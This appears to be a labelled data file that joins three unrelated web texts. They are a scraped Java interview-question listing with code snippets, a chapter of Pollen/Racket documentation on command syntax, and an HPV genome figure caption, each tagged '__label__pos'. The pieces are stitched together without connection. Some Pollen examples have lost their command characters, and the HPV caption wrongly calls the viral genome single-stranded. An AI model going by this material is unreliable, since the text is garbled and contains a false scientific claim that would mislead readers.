Java J2EE Interview Questions Questions Answers Views Company eMail What is garbage collection in Java, and how can it be used ? Infosys, HCL, Accenture, Wipro, Sara, SITS, TCS, 32 58687 Differentiate Vector and ArrayList? Wipro, Max Telecom, 6 8492 Differentiate constructor and a method and how are it be used? Wipro, 7 9023 What is an abstract class? Wipro, DBS, 7 7857 How can final class be used? Wipro, Accenture, 5 9800 By what default value is an object reference declared as an instance variable? Wipro, 1 11036 Java support what type of parameter passing ? Wipro, 7 12384 Explain the term serialization? Wipro, 10 10229 Is there is any error if you have multiple main methods in the same class? Wipro, Infosys, 10 11545 What is Overriding and how can it be used? Consagous, Wipro, 7 13937 How is serialization used generally ? 3 4838 How are Swing and AWT be differentiated? Wipro, 3 6127 Explain pass by reference and pass by value? IBM, Wipro, 8 12442 In which way does a Primitive data type is passed ? Sun Microsystems, 5 8139 What happens when a main method is declared as private? L&T, DELL, Infosys, Sun Microsystems, 22 38038 Un-Answered Questions { Java J2EE } Question 5 [15] Consider the following classes, illustrating the Strategy design pattern: import java.awt.*; abstract class Text { protected TextApplet tA; protected Text(TextApplet tApplet) { tA = tApplet; } abstract public void draw(Graphics g); } class PlainText extends Text { protected PlainText(TextApplet tApplet) { super(tApplet); } public void draw(Graphics g) { g.setColor(tA.getColor()); g.setFont(new Font("Sans-serif", Font.PLAIN, 12)); g.drawString(tA.getText(), 20, 20); } } class CodeText extends Text { protected CodeText(TextApplet tApplet) { super(tApplet); } public void draw(Graphics g) { g.setColor(tA.getColor()); g.setFont(new Font("Monospaced", Font.PLAIN, 12)); g.drawString(tA.getText(), 20, 20); } } public class TextApplet extends java.applet.Applet { protected Text text; protected String textVal; protected Color color; public String getText() { return textVal; } public Color getColor() { return color; } public void init() { textVal = getParameter("text"); String textStyle = getParameter("style"); String textColor = getParameter("color"); if (textStyle == "code") text = new CodeText(this); else text = new PlainText(this); if (textColor == "red") color = Color.RED; else if (textColor == "blue") color = Color.BLUE; else color = Color.BLACK; } public void paint(Graphics g) { text.draw(g); 10 } } The Text class is more complicated than it should be (there is too much coupling between the Text and TextApplet classes). By getting rid of the reference to a TextApplet object in the Text class and setting the colour in the paint() method, one could turn the Text class into an interface and simplify the strategy classes considerably. 5.1 Rewrite the Text and PlainText classes to do what is described above. (6) 5.2 Explain the consequent changes that are necessary to the TextApplet class. (4) 5.3 Write an additional strategy class called FancyText (to go with your simplified strategy classes) to allow fancy text to be displayed for the value "fancy" provided for the style parameter. It should use the font Font ("Serif", Font.ITALIC, 12). (3) 5.4 Explain what changes are necessary to the TextApplet class for this. (2) 1034 what is a portable component? 861 What is a policy? 1088 how is final different from finally and finalize in java? 1 difference between mqconn and mqconnx? 1 What are mq objects? 1 how to debug applications in message flow? 1 When should a function throw an exception? 2 Is there any way to find whether software installed in the system is registered by just providing the .exe file? I have tried the following code but its just displaying the directory structure in the registry. Here the code : package com.msi.intaller; import java.util.Iterator; import ca.beq.util.win32.registry.RegistryKey; import ca.beq.util.win32.registry.RootKey; public class RegistryFinder { public static void main(String... args) throws Exception { RegistryKey.initialize(RegistryFinder.class.getResource("jRe gistryKey.dll").getFile()); RegistryKey key = new RegistryKey(RootKey.HKLM, "Software\\ODBC"); for (Iterator subkeys = key.subkeys(); subkeys.hasNext();) { RegistryKey subkey = subkeys.next(); System.out.println(subkey.getName()); // You need to check here if there's anything which matches "Mozilla FireFox". } } } 774 in EJB diclare the static methods are not? 2162 How to display names of all components in a Container? 1882 what is session in java? 1 What is JMS API Architecture? 433 what is the broker domain? 1 what is mean by OLE ? Please answer me. Advance thanks. 1577
__label__pos
1
On this page: 12.1 The golden rule 12.2 The lozenge (◊) 12.2.1 “But I don’t want to use it ...” 12.2.2 Lozenge helpers 12.2.2.1 How MB types the lozenge 12.2.2.2 Dr  Racket toolbar button 12.2.2.3 Dr  Racket key shortcut 12.2.2.4 AHK script for Windows 12.2.2.5 Emacs script 12.2.2.6 Emacs input method 12.2.2.7 Vim (and Evil) digraph sequence 12.2.2.8 Compose key 12.3 The two command styles:   Pollen style & Racket style 12.3.1 The command name 12.3.1.1 Invoking tag functions 12.3.1.2 Invoking other functions 12.3.1.3 Inserting the value of a variable 12.3.1.4 Inserting metas 12.3.1.5 Retrieving metas 12.3.1.6 Inserting a comment 12.3.2 The Racket arguments 12.3.3 The text body 12.4 Embedding character entities 12.5 Adding Pollen-style commands to a Racket file 12.6 Further reading 7.0 12 Pollen command syntax 12.1 The golden rule Pollen uses a special character — the lozenge, which looks like this: ◊ — to mark commands within a Pollen source file. So when you put a ◊ in your source, whatever comes next will be treated as a command. If you don’t, it will just be interpreted as plain text. 12.2 The lozenge (◊) I chose the lozenge as the command character because a) it appears in almost every font, b) it’s barely used in ordinary typesetting, c) it’s not used in any programming language that I know of, and d) its shape and color allow it to stand out easily in code without being distracting. If you’re using DrRacket, you can use the Insert Command Char button at the top of the editing window to — you guessed it — insert the command character. If you’re using a different editor, here’s how you type it: Mac: Option + Shift + V Windows: holding down Alt, type 9674 on the num pad GNU/Linux, BSD: Type Ctrl + Shift + U, then 25CA, then Enter For more information on entering arbitrary Unicode glyphs, see Wikipedia. 12.2.1 “But I don’t want to use it ...” Fine, but you have to pick something as your command character. If you don’t like this one, you can override it within a project — see How to override setup values. Still, it’s not like I’m asking you to learn APL. Racket supports Unicode, so it’s a little silly to artificially limit ourselves to ASCII. My advice: don’t knock the lozenge till you try it. 12.2.2 Lozenge helpers 12.2.2.1 How MB types the lozenge I work on Mac OS. I use Typinator to assign the ◊ character to the otherwise never-used Option + Shift + backlash key combo (ordinarily assigned to »). For that matter, I assign λ to Option + backslash (ordinarily assigned to «). 12.2.2.2 DrRacket toolbar button When you use DrRacket, you’ll see a button in the toolbar that says Insert command char. This will insert the lozenge (or whatever command character you’ve defined for your project). 12.2.2.3 DrRacket key shortcut Courtesy of Phil Jones: “I created a file called "keys.rkt" #lang s-exp framework/keybinding-lang   (keybinding "c:<" (λ (editor evt) (send editor insert "◊"))) — and loaded it into DrRacket with Edit|Keybindings | Add user-defined keybindings .... Now I can use ctrl + shift + < to put the lozenge in.” See also Defining Custom Shortcuts in the DrRacket documentation. 12.2.2.4 AHK script for Windows Courtesy of Matt Wilkie: “Here’s a working AHK script to have double-tap backtick send the lozenge character. It took way more time than I want to think about, once started I couldn’t let go.” ; ; Double-tap backtick sends Pollen command character (◊) ; For some reason I needed to use Unicode 'U+25CA' ; instead of the standard alt-code '9674' ; ; Adapted from http://ahkscript.org/docs/commands/SetTimer.htm ; and http://www.autohotkey.com/board/topic/145507-how-to-use-double-tap-backtick-with-pass-through/ ; #EscapeChar \ $`:: if winc_presses > 0     {winc_presses += 1     return     }   winc_presses = 1 SetTimer, TheKey, 250 ; Wait for more presses, in milliseconds return   TheKey:     SetTimer, TheKey, off     if winc_presses = 1 ; The key was pressed once.         {Send `         }     else if winc_presses = 2 ; The key was pressed twice.         {Send {U+25CA}         }   ; Regardless of which action above was triggered, reset the count to ; prepare for the next series of presses: winc_presses = 0 return An alternative, courtesy of Eli Barzilay: “this turns M-\ to the lozenge”: !\:: Send {U+25CA} 12.2.2.5 Emacs script Courtesy of Richard Le: “I chose M-\ because that’s the key for the lambda character in DrRacket.” (Eli Barzilay shortened it.) (global-set-key "\M-\\" "◊") 12.2.2.6 Emacs input method Courtesy of Kristoffer Haugsbakk: “Press C-\ rfc1345 RET to choose the rfc1345 input method and toggle it on. When this input method is toggled, can be produced by entering &LZ. The input method can be toggled on and off with C-\.” 12.2.2.7 Vim (and Evil) digraph sequence Courtesy of Kristoffer Haugsbakk: “While in insert mode in Vim, or insert state in Evil (Emacs), press C-k LZ to enter . C-k lets you enter a digraph (in Vim terminology) which maps to another character. In this case, the digraph LZ maps to . To make another mapping for this character in Vim, execute the following command: :digraphs ll 9674 to (in this case) use the digraph ll. 9674 is the decimal representation of in Unicode.” 12.2.2.8 Compose key Courtesy of Reuben Thomas: “When using X11 (common on GNU/Linux and BSD systems), one can use the Compose key. It is often disabled by default; check your desktop environment’s keyboard settings, or at a lower level, to use the Menu key as the Compose key: setxkbmap -option compose:menu See man xkeyboard-config for all the ready-made options for the compose key. Since the lozenge character does not exist in the default compose-mapping file, you need to add this to your "~/.XCompose": <Multi_key> <l> <l> : "◊" See man XCompose, or for more details, including many additional Compose bindings, see pointless-xcompose.” 12.3 The two command styles: Pollen style & Racket style Pollen commands can be entered in one of two styles: Pollen style or Racket style. Both styles start with a lozenge ():  command name [ Racket arguments ... ] { text body ... }  ( Racket expression ) Pollen-style commands A Pollen-style command has the three possible parts after the : Each of the three parts is optional. You can also nest commands within each other. However: Here are a few examples of correct Pollen-style commands: #lang pollen variable-name tag{Text inside the tag.} tag[#:attr "value"]{Text inside the tag} get-customer-id["Brennan Huff"] tag{His ID is get-customer-id["Brennan Huff"].} And some incorrect examples: #lang pollen tag {Text inside the tag.} ; space between first and second parts tag[Text inside the tag] ; text body needs to be within braces tag{Text inside the tag}[#:attr "value"] ; wrong order The next section describes each of these parts in detail. Racket-style commands If you’re familiar with Racket expressions, you can use the Racket-style commands to embed them within Pollen source files. It’s simple: any Racket expression becomes a Pollen command by adding to the front. So in Racket, this code: #lang racket (define band "Level") (format "~a ~a" band (* 2 3 7)) Can be converted to Pollen like so: #lang pollen (define band "Level") (format "~a ~a" band (* 2 3 7)) And in DrRacket, they produce the same output: Level 42 Beyond that, there’s not much to say about Racket style — any valid Racket expression will also be a valid Racket-style Pollen command. The relationship of Pollen style and Racket style Even if you don’t plan to write a lot of Racket-style commands, you should be aware that under the hood, Pollen is converting all Pollen-style commands to Racket style. So a Pollen-style command that looks like this: headline[#:size 'enormous]{Man Bites Dog!} Is actually being turned into this Racket-style command: (headline #:size 'enormous "Man Bites Dog!") Thus a Pollen-style command is just an alternate way of writing a Racket-style command. (More broadly, all of Pollen is just an alternate way of using Racket.) The corollary is that you can always write Pollen commands using whichever style is more convenient or readable. For instance, the earlier example, written in the Racket style: #lang pollen (define band "Level") (format "~a ~a" band (* 2 3 7)) Can be rewritten in Pollen style: #lang pollen define[band]{Level} format["~a ~a" band (* 2 3 7)] And it will work the same way. You can combine the two styles in whatever way makes sense to you. I typically reserve Pollen-style commands for when I’m mixing commands into textual material. Meaning, I prefer ◊headline[#:size 'enormous]{Man Bites Dog!} over (headline #:size 'enormous "Man Bites Dog!"). But when I’m writing or using traditional Racket functions, I find Racket-style commands to be more readable (because they correspond to ordinary Racket syntax, and thus can be moved between Pollen and Racket source files more easily). So I prefer (define band "Level") over ◊define[band]{Level}. 12.3.1 The command name In Pollen, you’ll likely use a command for one of these purposes: Let’s look at each kind of use. 12.3.1.1 Invoking tag functions By default, Pollen treats every command name as a tag function. The default tag function creates a tagged X-expression with the command name as the tag, and the text body as the content. #lang pollen strong{Fancy Sauce, $1} '(strong "Fancy Sauce, $1") To streamline markup, Pollen doesn’t restrict you to a certain set of tags, nor does it make you define your tags ahead of time. Just type a tag, and you can start using it. #lang pollen utterly-ridiculous-tag-name{Oh really?} '(utterly-ridiculous-tag-name "Oh really?") The one restriction is that you can’t invent names for tags that are already being used for other commands. For instance, map is a name permanently reserved by the Racket function map. It’s also a rarely-used HTML tag. But gosh, you really want to use it. Problem is, if you invoke it directly, Pollen will think you mean the other map: #lang pollen map{Fancy Sauce, $1} map: arity mismatch; the expected number of arguments does not match the given number   given: 1   arguments...:     "Fancy Sauce, $1" What to do? Read on. 12.3.1.2 Invoking other functions Though every command name starts out as a default tag function, it doesn’t necessarily end there. You have two options for invoking other functions: defining your own, or invoking others from Racket. Defining your own functions Use the define command to create your own function for a command name. After that, when you use the command name, you’ll get the new behavior. For instance, recall this example showing the default tag-function behavior: #lang pollen strong{Fancy Sauce, $1} '(strong "Fancy Sauce, $1") We can define strong to do something else, like add to the text: #lang pollen (define (strong text) `(strong ,(format "Hey! Listen up! ~a" text))) strong{Fancy Sauce, $1} '(strong "Hey! Listen up! Fancy Sauce, $1") The replacement function has to accept any arguments that might get passed along, but it doesn’t have to do anything with them. For instance, this function definition won’t work because strong is going to get a text body that it’s not defined to handle: #lang pollen (define (strong) '(fib "1 1 2 3 5 8 13 ...")) strong{Fancy Sauce, $1} strong: arity mismatch; the expected number of arguments does not match the given number   expected: 0   given: 1   arguments...:     "Fancy Sauce, $1" Whereas in this version, strong accepts an argument called text, but then ignores it: #lang pollen (define (strong text) '(fib "1 1 2 3 5 8 13 ...")) strong{Fancy Sauce, $1} '(fib "1 1 2 3 5 8 13 ...") The text body can pass an indefinite number of arguments. A well-designed tag function should be able to handle them, unlike these synthetic examples. For a more realistic example, see The text body. You can attach any behavior to a command name. As your project evolves, you can also update the behavior of a command name. In that way, Pollen commands become a set of hooks to which you can attach more elaborate processing. Using Racket functions You aren’t limited to functions you define. Any function from Racket, or any Racket library, can be invoked directly by using it as a command name. Here’s the function range, which creates a list of numbers: #lang pollen (range 1 20) '(range 1 20) Hold on — that’s not what we want. Where’s the list of numbers? The problem here is that we forgot to import the racket/list library, which contains the definition for range. (If you need to find out what library contains a certain function, the Racket documentation will tell you.) Without racket/list, Pollen just thinks we’re trying to use range as a tag function (and if we had been, then '(range 1 20) would’ve been the right result). We fix this by using the require command to bring in the racket/list library, which contains the range we want: #lang pollen (require racket/list) (range 1 20) '(1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19) Of course, you can also invoke Racket functions indirectly, by attaching them to functions you define for command names: #lang pollen (require racket/list) (define (rick start finish) (range start finish)) (rick 1 20) '(1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19) Let’s return to the problem that surfaced in the last section — the fact that some command names can’t be used as tag functions because they’re already being used for other things. You can work around this by defining your own tag function with a non-conflicting name. For instance, suppose we want to use map as a tag even though Racket is using it for its own function called map. First, we invent a command name that doesn’t conflict. Let’s call it my-map. As you learned above, Pollen will treat a new command name as a tag function by default: #lang pollen my-map{How I would love this to be a map.} '(my-map "How I would love this to be a map.") But my-map is not the tag we want. We need to define my-map to be a tag function for map. We can do this with the Pollen helper default-tag-function. That function lives in pollen/tag, so we require that too: #lang pollen (require pollen/tag) (define my-map (default-tag-function 'map)) my-map{How I would love this to be a map.} '(map "How I would love this to be a map.") Problem solved. 12.3.1.3 Inserting the value of a variable A Pollen command name usually refers to a function, but it can also refer to a variable, which is a data value. Once you define the variable, you can insert it into your source by using the ◊ notation without any other arguments: #lang pollen (define foo "bar") The value of foo is foo The value of foo is bar Be careful — if you include arguments, even blank ones, Pollen will treat the command name as a function. For instance, this next example won’t work, because a variable is not a function: #lang pollen (define foo "bar") The value of foo is foo[] application: not a procedure; expected a procedure that can be applied to arguments   given: "bar"   arguments...: [none] To understand what happens here, recall the relationship between Pollen’s command styles. The Pollen-style command ◊foo[] becomes the Racket-style command (foo), which after variable substitution becomes ("bar"). If you try to evaluate ("bar") — e.g., in DrRacket — you’ll get the same error. The reason we can simply insert ◊foo into the text body of another Pollen command is that the variable foo holds a string (i.e., a text value). In preprocessor source files, Pollen will convert a variable to a string in a sensible way. For instance, numbers are easily converted: #lang pollen (define zam 42) The value of zam is zam The value of zam is 42 In an unsaved DrRacket file, or a file without a special Pollen source extension, the #lang pollen designation invokes the Pollen preprocessor by default. You can explicitly invoke preprocessor style by starting a file with #lang pollen/pre. See also Preprocessor (.pp extension). If the variable holds a container datatype (like a list, hash, or vector), Pollen will produce the Racket text representation of the item. Here, zam is a list of integers: #lang pollen (define zam (list 1 2 3)) The value of zam is zam The value of zam is '(1 2 3) This feature is included for your convenience. But in general, your readers won’t want to see the Racket representation of a container. So in these cases, you should convert to a string manually in some sensible way. Here, the integers in the list are converted to strings, which are then combined using string-join from the racket/string library: #lang pollen (require racket/string) (define zam (list 1 2 3)) The value of zam is (string-join (map number->string zam) " and ") The value of zam is 1 and 2 and 3 Pollen will still produce an error if you try to convert an esoteric value to a string. Here, zam is the addition function (+): #lang pollen (define zam +) The value of zam is zam pollen: Can't convert procedure #<procedure:+> to string In Pollen markup, the result is different. A Pollen markup file makes an X-expression, not text, so Pollen doesn’t perform any automatic text conversion — that’s your job. Suppose we take the example above — which worked with the Pollen preprocessor — and change the language to pollen/markup: #lang pollen/markup (define zam (list 1 2 3)) The value of zam is zam This time, the file will produce an error: pollen markup error: in '(root "The value of zam is " (1 2 3)), '(1 2 3) is not a valid element (must be txexpr, string, symbol, XML char, or cdata) But the second example above, with the explicit conversion using string-join, does work in Pollen markup, because strings are valid X-expressions: #lang pollen/markup (require racket/string) (define zam (list 1 2 3)) The value of zam is (string-join (map number->string zam) " and ") '(root "The value of zam is " "1 and 2 and 3") See File formats for more about the differences between Pollen dialects. One special case to know about. In the examples above, there’s a word space between the variable and the other text. But suppose you need to insert a variable into text so that there’s no space in between. The simple ◊ notation won’t work, because it won’t be clear where the variable name ends and the text begins. For instance, suppose we want to use a variable edge next to the string px: #lang pollen (define edge 100) p { margin-left: edgepx; } pollen: Can't convert procedure #<procedure:pollen-tag:edgepx> to string The example fails because Pollen reads the whole string after the as the single variable name edgepx. Since edgepx isn’t defined, it’s treated as a tag function, and since Pollen can’t convert a function to a string, we get an error. In these situations, surround the variable name with vertical bars ◊|like so| to explicitly indicate where the variable name ends. The bars are not treated as part of the name, nor are they included in the result. Once we do that, we get what we intended: #lang pollen (define edge 100) p { margin-left: ◊|edge|px; } p { margin-left: 100px; } If you use this notation when you don’t need to, nothing bad will happen. The vertical bars are always ignored. #lang pollen (define edge 100) The value of edge is ◊|edge| pixels} The value of edge is 100 pixels 12.3.1.4 Inserting metas Metas are key–value pairs embedded in a source file that are not included in the main output when the source is compiled. Rather, they’re gathered and exported as a separate hash table called, unsurprisingly, metas. This hash table is a good place to store information about the document that you might want to use later (for instance, a list of topic categories that the document belongs to). Pollen occasionally uses metas internally. For instance, the get-template-for function will look in the metas of a source file to see if a template is explicitly specified. The pollen/core module also contains functions for working with metas, such as select-from-metas. To make a meta, you create a tag with the special define-meta name, followed by a key name, and then a value that’s a single X-expression: #lang pollen   define-meta[dog]{Roxy} ; Pollen-style syntax some-tag[#:foo "bar"]{Normal tag} (define-meta cat "Chopper") ; equivalent Racket-style syntax some-tag[#:zim "zam"]{Another normal tag} When you run a source file with metas in it, two things happen. First, the metas are removed from the output: '(some-tag ((key "value")) "Normal tag") '(some-tag ((key "value")) "Another normal tag") Second, the metas are collected into a hash table that is exported with the name metas. To see this hash table, run the file above in DrRacket, then switch to the interactions window and type metas at the prompt: > metas '#hasheq((dog . "Roxy") (cat . "Chopper") (here-path . "unsaved-editor")) The only key that’s automatically defined in every meta table is 'here-path, which is the absolute path to the source file. (In this case, because the file hasn’t been saved, you’ll see the "unsaved-editor" name instead.) Still, you can override this too: #lang pollen   define-meta[dog]{Roxy} some-tag[#:key "value"]{Normal tag} (define-meta cat "Chopper") some-tag[#:key "value"]{Another normal tag} (define-meta here-path "tesseract") When you run this code, the result will be the same as before, but this time the metas will be different: > metas '#hasheq((dog . "Roxy") (cat . "Chopper") (here-path . "tesseract")) It doesn’t matter how many metas you put in a source file, nor where you put them. They’ll all be extracted into the metas hash table. The order of the metas is not preserved (because order is not preserved in a hash table). But if you have two metas with the same key, the later one will supersede the earlier one: #lang pollen define-meta[dog]{Roxy} (define-meta dog "Lex") Though there are two metas named dog, only the second one persists: > metas '#hasheq((dog . "Lex") (here-path . "unsaved-editor")) What if you want to use a sequence of X-expression elements as a meta value? You can convert them into a single X-expression by wrapping them in a containing tag. You can use a new tag, or even just the @ splicing tag: #lang pollen/markup (define-meta title @{Conclusion to em{Infinity War}})   The title is (select-from-metas 'title metas) '(root "The title is " "Conclusion to " (em "Infinity War")) 12.3.1.5 Retrieving metas The metas hashtable is available immediately within the body of your source file. You can use select to get values out of metas. #lang pollen (define-meta dog "Roxy") (select 'dog metas) Roxy metas is an immutable hash, so you can also use immutable-hash functions, like hash-ref: #lang pollen (define-meta dog "Roxy") (hash-ref metas 'dog) Roxy Because the metas are collected first, you can actually invoke a meta before you define it: #lang pollen (select 'dog metas) (define-meta dog "Roxy") (define-meta dog "Spooky") Spooky This can be useful for setting up fields that you want to include in metas but also have visible in the body of a document, like a title. #lang pollen/markup (define-meta title "The Amazing Truth") h1{(select 'title metas)} The result of this file will be: '(root (h1 "The Amazing Truth")) And the metas: > metas '#hasheq((title . "The Amazing Truth") (here-path . "unsaved-editor")) Pro tip: Within Pollen, the fastest way to get a metas hashtable from another source file is to use cached-metas. Pro tip #2: Outside Pollen, the metas hashtable is available when you import a Pollen source file in the usual way, but it’s also made available through a submodule called, unsurprisingly, metas. #lang racket/base (require "pollen-source.rkt") ; doc and metas and everything else (require (submod "pollen-source.rkt" metas)) ; just metas The metas submodule gives you access to the metas hashtable without compiling the rest of the file. So if you need to harvest metas from a set of source files — for instance, page titles (for a table of contents) or categories — using require with the submodule will be faster. 12.3.1.6 Inserting a comment Two options. To comment out the rest of a single line, use a lozenge followed by a semicolon ◊;. #lang pollen span{This is not a comment} span{Nor is this} ◊;span{But this is} '(span "This is not a comment") '(span "Nor is this") To comment out a multiline block, use the lozenge–semicolon signal ◊; with curly braces, ◊;{like so}. #lang pollen ◊;{ span{This is not a comment} span{Nor is this} ◊;span{But this is} } Actually, it's all a comment now Actually, it's all a comment now 12.3.2 The Racket arguments The middle part of a Pollen-style command contains the Racket arguments [between square brackets.] Most often, you’ll see these used to pass extra information to commands that operate on text. For instance, tag functions. Recall from before that any not-yet-defined command name in Pollen is treated as a tag function: #lang pollen title{The Beginning of the End} '(title "The Beginning of the End") But what if you wanted to add attributes to this tag, so that it comes out like this? '(title ((class "red")(id "first")) "The Beginning of the End") You can do it with Racket arguments. Here’s the hard way. You can type out your list of attributes in Racket format and drop them into the brackets as a single argument: #lang pollen title['((class "red")(id "first"))]{The Beginning of the End} '(title ((class "red") (id "first")) "The Beginning of the End") But that’s a lot of parentheses to think about. So here’s the easy way. Whenever you use a tag function, there’s a shortcut for inserting attributes. You can enter them as a series of keyword arguments between the Racket-argument brackets. The only caveat is that the values for these keyword arguments have to be strings. So taken together, they look like this: #lang pollen title[#:class "red" #:id "first"]{The Beginning of the End} '(title ((class "red") (id "first")) "The Beginning of the End") The string arguments can be any valid Racket expressions that produce strings. For instance, this will also work: #lang pollen title[#:class (number->string (* 6 7)) #:id "first"]{The Beginning of the End} '(title ((class "42") (id "first")) "The Beginning of the End") Since Pollen commands are really just Racket arguments underneath, you can use those too. Here, we’ll define a variable called name and use it in the Racket arguments of title: #lang pollen (define name "Brennan") title[#:class "red" #:id name]{The Beginning of the End} '(title ((class "read") (id "Brennan")) "The Beginning of the End") When used in custom tag functions, keyword arguments don’t have to represent attributes. Instead, they can be used to provide options for a particular Pollen command, to avoid redundancy. Suppose that instead of using the h1 ... h6 tags, you want to consolidate them into one command called heading and select the level separately. You can do this with a keyword, in this case #:level, which is passed as a Racket argument: #lang pollen (define (heading #:level which text)    `(,(string->symbol (format "h~a" which)) ,text))   heading[#:level 1]{Major league} heading[#:level 2]{Minor league} heading[#:level 6]{Trivial league} '(h1 "Major league") '(h2 "Minor league") '(h6 "Trivial league") Pro tip: See also define-tag-function, which automatically converts keyword arguments into attributes before they reach your function: #lang pollen (require pollen/tag) (define-tag-function (heading attrs elems)   (define level (cadr (assq 'level attrs)))   `(,(string->symbol (format "h~a" level)) ,@elems))   heading[#:level 1]{Major league} heading[#:level 2]{Minor league} heading[#:level 6]{Trivial league} '(h1 "Major league") '(h2 "Minor league") '(h6 "Trivial league") 12.3.3 The text body The third part of a Pollen-style command is the text body. The text body {appears between curly braces}. It can contain any text you want. The text body can also contain other Pollen commands with their own text body. And they can contain other Pollen commands ... and so on, all the way down. #lang pollen div{Do it again. div{And again. div{And yet again.}}} '(div "Do it again. " (div "And again. " (div "And yet again."))) Three things to know about the text body. First, the only character that needs special handling in the text body is the lozenge . A lozenge ordinarily marks a new command. So if you want an actual lozenge to appear in the text, you have to escape it by typing ◊"◊". #lang pollen definition{This is the lozenge: "◊"} '(definition "This is the lozenge: ◊") Second, the whitespace-trimming policy. Here’s the short version: if there’s a newline at either end of the text body, it is trimmed, and whitespace at the end of each line is selectively trimmed in an intelligent way. So this text body, with newlines on the ends: #lang pollen div{ Roomy!   I agree. } '(div "Roomy!" "\n" "\n" "I agree.") Yields the same result as this one, without the newlines: #lang pollen div{Roomy!   I agree.} '(div "Roomy!" "\n" "\n" "I agree.") For the long version, please see Spaces, Newlines, and Indentation. Third, within a multiline text body, newline characters become individual strings that are not merged with adjacent text. So what you end up with is a list of strings, not a single string. That’s why in the last example, we got this: '(div "Roomy!" "\n" "\n" "I agree.") Instead of this: '(div "Roomy!\n\nI agree.") Under most circumstances, these two tagged X-expressions will behave the same way. The biggest exception is with functions. A function that might operate on a multiline text body needs to be able to handle an indefinite number of strings. For instance, this jejune function only accepts a single argument. It will work with a single-line text body, because that produces a single string: #lang pollen (define (jejune text)    `(jejune ,text)) jejune{Irrational confidence} '(jejune "Irrational confidence") But watch what happens with a multiline text body: #lang pollen (define (jejune text)    `(jejune ,text)) jejune{Deeply         chastened} jejune: arity mismatch; the expected number of arguments does not match the given number   expected: 1   given: 3   arguments...:    "Deeply"    "\n"    "chastened" The answer is to use a rest argument in the function, which takes the “rest” of the arguments — however many there may be — and combines them into a single list. If we rewrite jejune with a rest argument, we can fix the problem: #lang pollen (define (jejune . texts)    `(jejune ,@texts)) jejune{Deeply         chastened} '(jejune "Deeply" "\n" "chastened") 12.4 Embedding character entities XML and HTML support character entities, a way of encoding Unicode characters with a name or number. For instance, in HTML, the copyright symbol © can be encoded by name as &copy; or by number as &#169;. Entities originated as a way of embedding Unicode characters in an ASCII data stream. Pollen and Racket, however, support Unicode directly. So does every major web browser (though your document may need a Unicode character-set declaration to trigger it). So usually, your best bet is insert Unicode characters directly into your source rather than use entities. But if you really need entities, here’s what to do. Pollen treats everything as text by default, so you can’t insert entities merely by typing them, because they’ll just be converted to text: #lang pollen div{copy      169} '(div "copy" "\n" "169") Instead, named entities are handled as Symbols and numeric entities are, unsurprisingly, Numbers. So you can use the string->symbol and string->number functions to convert your entity input: #lang pollen div{string->symbol{copy}      string->number{169}} '(div copy "\n" 169) Notice that in the output, there are no more quote marks around copy and 169, indicating that they’re not strings. When you pass this result to a converter like ->html, the entities will be escaped correctly: #lang pollen (require pollen/template)   ->html{div{copy 169}}   ->html{div{string->symbol{copy} string->number{169}}} <div>copy 169</div> <div>&copy; &#169;</div> For numeric entities, you can also use a four-digit Unicode hex number by prefacing it with #x, which is the standard Racket prefix for a hex number: #lang pollen div{string->number{169}      string->number{#x00a9}} '(div 169 "\n" 169) Of course, you don’t need to use string->symbol and string->number directly in your source. You can also define tag functions that generate entities. The key point is that to be treated as an entity, the return value must be a symbol or number, rather than a string. 12.5 Adding Pollen-style commands to a Racket file  #lang pollen/mode package: pollen Just as you can embed any Racket-style command in a Pollen source file, you can go the other way and embed Pollen-style commands in a Racket file. Just insert pollen/mode in the #lang line at the top of your source: "pollen.rkt" #lang pollen/mode racket/base (require pollen/tag)   (define link (default-tag-function 'a))   (define (home-link)   (link #:href "index.html" "Click to go home"))   (define (home-link-pollen-style)   link[#:href "index.html"]{Click to go home})   Here, both (home-link) and (home-link-pollen-style) will produce the same X-expression as a result: '(a ((href "index.html")) "Click to go home") Of course, you can use pollen/mode in any Racket source file, not just "pollen.rkt". Major caveat: pollen/mode only works with Pollen’s default command character, namely the lozenge (). If you’ve overridden this command character in your "pollen.rkt" file, your custom command character will work everywhere except in pollen/mode. This limitation is necessary to prevent the intractable situation where "pollen.rkt" relies on pollen/mode, but pollen/mode relies on a config setting in "pollen.rkt". Also keep in mind that pollen/mode is just a syntactic convenience. It doesn’t change any of the underlying semantics of your Racket source file. Your Pollen-style commands are being translated into Racket commands and compiled along with everything else. Another good way to use Pollen-style commands in Racket is for unit tests with rackunit. With pollen/mode, you can write your unit tests in Pollen style or Racket style (or mix them). This makes it easy to verify that Pollen-style commands will turn into the Racket values that you expect: "pollen.rkt" #lang pollen/mode racket/base (require rackunit)   (define (tag-fn arg . text-args)   `(div ((class ,arg)) ,@text-args))   (check-equal? tag-fn["42"]{hello world}               '(div ((class "42")) "hello world"))   (check-equal? (tag-fn "42" "hello world")               '(div ((class "42")) "hello world"))   (check-equal? tag-fn["42"]{hello world}               'div[((class "42"))]{hello world})   12.6 Further reading The Pollen language is a variant of Racket’s own text-processing language, called Scribble. Thus, most things that can be done with Scribble syntax can also be done with Pollen syntax. For the sake of clarity & brevity, I’ve only shown you the highlights here. But if you want the full story, see @ Syntax in the Scribble documentation.  
__label__pos
0.815903
Figure 2 The HPV genome and its expression within the epithelium The HPV genome consists of about 8000 bp of single-stranded, circular DNA. There are eight open reading frames and an upstream regulatory region. HPV genes are designated as E or L according to their expression in early or late differentiation stage of the epithelium: E1, E2, E5, E6, and E7 are expressed early in the differentiation, E4 is expressed throughout, and L1 and L2 are expressed during the final stages of differentiation. The viral genome is maintained at the basal layer of the epithelium, where HPV infection is established. Early proteins are expressed at low levels for genome maintenance (raising the possibility of a latent state) and cell proliferation. As the basal epithelial cells differentiate, the viral life cycle goes through success stages of genome amplification, virus assembly, and virus release, with a concomitant shift in expression patterns from early genes to late genes, including L1 and L2, which assemble into viral capsid. L1 is the major capsid protein while L2 serves as the link to the plasmid DNA. Adapted from Doorbar.21 Figure 2
__label__pos
0.839076
